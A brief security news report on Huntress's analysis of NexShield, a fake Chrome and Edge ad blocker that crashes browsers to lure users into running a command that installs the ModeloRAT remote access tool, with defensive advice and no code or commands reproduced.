A technical analysis by Huntress says a fake Chrome and Edge ad blocker called NexShield intentionally crashed browsers earlier this month by exhausting memory, causing frozen tabs and process hangs, and was used to deliver a Python remote access tool called ModeloRAT.
KEY FACTS
- Incident A fake ad blocker named NexShield caused real browser crashes to prompt further action
- Technique Infinite ‘chrome.runtime’ port connections exhausted browser memory and CPU
- Payload ModeloRAT, a Python based RAT, was deployed to domain joined hosts
- Mitigation NexShield was removed from the Chrome Web Store and full system cleanup is recommended
The extension creates an infinite loop of chrome.runtime port connections that exhaust browser memory. The outcome is frozen tabs, elevated CPU and RAM use in the browser process, and eventual hangs or crashes that often require termination via Task Manager.
When the browser is restarted the extension displays a deceptive pop up that urges a scan and opens a window with a fake warning. The interface copies a command to the clipboard and instructs the user to paste and run it in Command Prompt. That chain launches an obfuscated PowerShell script from a remote source which downloads and executes additional code.
The payload delays execution by about 60 minutes after installation. On domain joined hosts the campaign delivers ModeloRAT, which can collect reconnaissance, execute PowerShell commands, modify the Registry, introduce further payloads, and update itself. On non domain hosts the command and control returned a “TEST PAYLOAD!!!!” message.
Users should install extensions only from trusted publishers and avoid running external commands whose effect is not understood. Uninstalling NexShield does not remove all payloads so affected systems should receive a full cleanup. The actor name is ‘KongTuke’ and the campaign has been active since early 2025 with a move toward enterprise targets.
WHY IT MATTERS
Successful ClickFix style attacks can deliver persistent remote access tools to corporate networks and enable post compromise activity. Careful extension selection and never running unknown external commands reduce the risk.